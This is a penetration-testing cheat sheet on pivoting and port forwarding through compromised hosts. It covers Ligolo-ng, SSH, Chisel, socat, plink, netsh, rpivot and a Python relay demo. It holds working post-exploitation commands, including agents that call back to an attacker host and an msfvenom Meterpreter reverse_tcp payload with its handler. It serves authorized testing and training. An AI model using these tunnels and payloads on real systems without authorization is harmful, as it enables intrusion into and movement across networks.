# Pivoting / Forwarding

## 00. Basic Enumerations

```bash
## ------------------| Check arp table
arp -an
```

## 01. Port Forwarding

### 01.0 [Ligolo-ng](https://github.com/tnpitsecurity/ligolo-ng)

```bash
## ------------------| Agent [target/victim computer]
.\agent.exe -connect <MyIP>:11601 -ignore-cert

## ------------------| Server [My Computer]
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert
## inside the ligolo-ng proxy prompt:
session        # select the agent session that just connected
ifconfig       # list the agent's interfaces to find the internal range
## in another shell: route the internal range through the tun interface
sudo ip route add <IPRange>/24 dev ligolo
## back in the ligolo-ng prompt:
start          # bring the tunnel up
nmap <IP>
```

### 01.1 SSH Port Forward

```bash
## -N   Do not execute a remote command. This is useful for just forwarding ports.
## ~C   Opens the ssh command line inside an existing session; type it as the very
##      first thing after a newline, then enter the -L/-R/-D option at the ssh> prompt.
~C

## ------------------| Local Port Forward
## Local Host <--> SSH Server <--> Remote Host
ssh -L <host_port>:<remote_ip>:<remote_port> <user>@<sshserverip>

## 3306 is the victim's machine port
## 1337 is our machine port (listens on our side, connects out through the pivot)
ssh> -L 1337:127.0.0.1:3306
ssh -L 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Remote Port Forward
## Remote Host <--> SSH Server <--> Local Host
ssh -R <remote_port>:<remote_ip>:<host_port> <user>@<sshserverip>

## With -R the listener is opened on the SSH server side and each connection is
## sent back to a host:port reachable from the client side:
## 1337 is opened on <machine_to_pivot>
## 3306 is reached from the machine running this ssh command (127.0.0.1 here)
ssh -R 1337:127.0.0.1:3306 <user>@<machine_to_pivot>

## ------------------| Dynamic Port Forward (use with proxychains)
ssh> -D 1080

## Config proxychains: add this line at the end of /etc/proxychains.conf
sudo vi /etc/proxychains.conf
socks5 127.0.0.1 1080
## 1080 is the SOCKS port on our machine
ssh -D 127.0.0.1:1080 <user>@<machine_to_pivot>
ssh -D 127.0.0.1:1080 -f -N <user>@<machine_to_pivot>   # -f: go to background, -N: no remote command
## Launch nmap (-sT: full TCP connect scan, since a SOCKS proxy only carries TCP connections)
proxychains nmap -sT 172.16.1.0/24
```

### 01.2 [Socat](https://www.redhat.com/sysadmin/getting-started-socat) Multipurpose relay

```bash
## Listen on 4444 and hand every connection (fork) to port 631 on this host
socat TCP-LISTEN:4444,fork TCP:0.0.0.0:631
## Same, but only listen on the 10.10.14.26 address and relay to local 3306
socat TCP-LISTEN:4444,fork,bind=10.10.14.26 TCP:127.0.0.1:3306
```
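What a `TCP-LISTEN:...,fork TCP:...` relay (and likewise rinetd or `netsh portproxy` below) actually does, as an added Python example that is not part of the original page: accept a client, open a second connection to the target, and copy bytes in both directions until each side hits EOF. The echo service standing in for the internal port (the page's 3306) is constructed for the demo.

```python
import socket
import threading

def _pump(src, dst):
    """One relay direction: copy src -> dst until EOF, then half-close dst."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)  # propagate EOF so the far end finishes cleanly
        except OSError:
            pass

def _serve(host, port, handler):
    """Bind host:port (0 = OS-chosen), run an accept loop in the background, one thread per client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def start_relay(listen_host, listen_port, target_host, target_port):
    """Splice every client on listen_host:listen_port to target_host:target_port; returns the bound port."""
    def splice(client):
        upstream = socket.create_connection((target_host, target_port))
        threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
        _pump(upstream, client)
    return _serve(listen_host, listen_port, splice)

def start_echo_server():
    """Constructed stand-in for the internal service (the page's 3306): echoes bytes back."""
    return _serve("127.0.0.1", 0, lambda conn: _pump(conn, conn))

def relay_roundtrip(payload):
    """Send payload through relay -> echo service and return the bytes that come back."""
    relay_port = start_relay("127.0.0.1", 0, "127.0.0.1", start_echo_server())
    with socket.create_connection(("127.0.0.1", relay_port)) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)  # our EOF travels through the relay just like the data
        return b"".join(iter(lambda: s.recv(4096), b""))
```

The same splice is what `bind=` restricts in the second socat line: only the listening side changes, the copy loop does not.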

### 01.3 Using [Chisel](https://github.com/jpillora/chisel/releases)

```bash
## ------------------| Normal
## Server side (our machine): --reverse lets clients open listeners here
./chisel server --reverse --port 1234
## Client side (compromised machine): R:<server_port>:<host>:<port> opens the port on the server
## and tunnels it to host:port as seen from the client
./chisel client 10.10.14.26:1234 R:3000:127.0.0.1:3000 R:3001:127.0.0.1:3001

## ------------------| SOCKS5 (With Proxychains)
## Server side
chisel server --reverse --port 1234
## Client side: open a SOCKS5 listener on the server's 1080 that exits on the client's network
./chisel client 10.14.14.7:1234 R:0.0.0.0:1080:socks
## Edit /etc/proxychains.conf
socks5   127.0.0.1   1080
## Use nmap with proxychains (-sT, as with the SSH dynamic forward)
```

### 01.4 Using [sshuttle](https://github.com/sshuttle/sshuttle)

```bash
## ------------------| For all routes (0/0 and 0.0.0.0/0 are the same thing)
sudo sshuttle -vvr root@10.10.110.100 0/0
sudo sshuttle -vr root@10.10.110.100 0/0 --ssh-cmd "ssh -i ./id_rsa"
sudo sshuttle -vr root@10.10.110.100 0.0.0.0/0 --ssh-cmd "ssh -i ./id_rsa"

## ------------------| For specific route
sudo sshuttle -vr root@10.10.110.100 172.16.1.0/24 --ssh-cmd "ssh -i ./id_rsa"
```

### 01.5 Using ncat tunnel

```bash
## ------------------| Set ncat up as an HTTP CONNECT proxy on the target machine
ncat -vv --listen 1337 --proxy-type http

## ------------------| Edit on the attacker machine (10.10.110.100 is the pivot host where ncat listens)
## echo needs -e for the \t escapes, and writing to /etc/proxychains.conf needs root
echo -e "http\t10.10.110.100\t1337" | sudo tee -a /etc/proxychains.conf
# To verify
tail -2 /etc/proxychains.conf

## ------------------| Then use proxychains
proxychains nmap -sT 172.16.1.0/24
```

### 01.6 Using [httptunnel](https://github.com/larsbrinkhoff/httptunnel)

```bash
## ------------------| On Server (compromised host): listen on 1337 over HTTP, deliver to localhost:3306
hts --forward-port localhost:3306 1337

## ------------------| On Client (our machine): local 3306 is tunnelled to the server's 1337
htc --forward-port 3306 <compromised_ip>:1337
```

### 01.7 Using Plink.exe

```bash
cp /usr/share/windows-resources/binaries/plink.exe .

## Run on the compromised Windows host: open 445 on our box, send it back to the host's 127.0.0.1:445
.\plink.exe root@<OURIP> -R 445:127.0.0.1:445

## Non-interactive: auto-accept the host key, password on the command line
cmd.exe /c echo y | plink.exe -ssh -l <USER> -pw <PASSWORD> -R <our_ip>:1337:127.0.0.1:3306 <our_ip>
```

### 01.8 Using netsh.exe

```bash
## 3306 is the port on the remote (internal) machine
## 1337 is the port opened on the compromised machine
netsh interface portproxy add v4tov4 listenport=1337 listenaddress=<compromised_ip> connectport=3306 connectaddress=<remote_ip>

## Add firewall rule for the listening port
netsh advfirewall firewall add rule name="forward_port" protocol=TCP dir=in localip=<compromised_ip> localport=1337 action=allow
```

### 01.9 Using [rinetd](https://github.com/samhocevar/rinetd)

```bash
## ------------------| Forward my google.com traffic to the restricted device
sudo vi /etc/rinetd.conf
### Jump to line number 19 and add the following line (bindaddress bindport connectaddress connectport)
0.0.0.0    80    <GoogleIPAddress>    80
### Restart service
sudo service rinetd restart

### Success? (on the restricted machine)
nc -znv <AttackerIP> 80
```

### 01.10 Using [rpivot.exe](https://github.com/klsecservices/rpivot) \[Best for Windows XP]

```bash
## ------------------| Start server on attacker machine
git clone https://github.com/klsecservices/rpivot.git && cd rpivot
python2 server.py --server-ip 0.0.0.0 --server-port 8989

## ------------------| Start rpivot on compromised machine
wget https://github.com/klsecservices/rpivot/releases/download/v1.0/client.exe
.\client.exe --server-ip <IP> --server-port 8989

## ------------------| Proxy: add this line to /etc/proxychains.conf (rpivot speaks SOCKS4)
socks4	127.0.0.1	1080
proxychains nmap -sT -p 80 <IP>
```

### 01.11 Using Metasploit with Meterpreter

```bash
## ------------------| Create payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<MyIP> LPORT=7799 -f elf -o msf.bin

## ------------------| Launch MSFConsole
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 7799
set lhost 10.10.14.13
run -j
sessions -i

## ------------------| Method 0x01: route the internal subnet through the session, then expose it as SOCKS
route add <Compromised_IP_Address/24> <meterpreter_session_id>
## --> ex : route add 172.17.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080 # edit this port on /etc/proxychains.conf (socks5)
run

## ------------------| Method 0x02: single-port forward from the meterpreter session
## !! You must be on the " meterpreter > " shell
portfwd add -l 8003 -p 3306 -r 172.17.0.2
    ## -l (8003) is the port that listens on our machine
    ## -p (3306) is the port on the remote host
    ## -r (172.17.0.2) is the remote host, reached from the compromised machine
    ## then you can use 127.0.0.1:8003 from your end
```
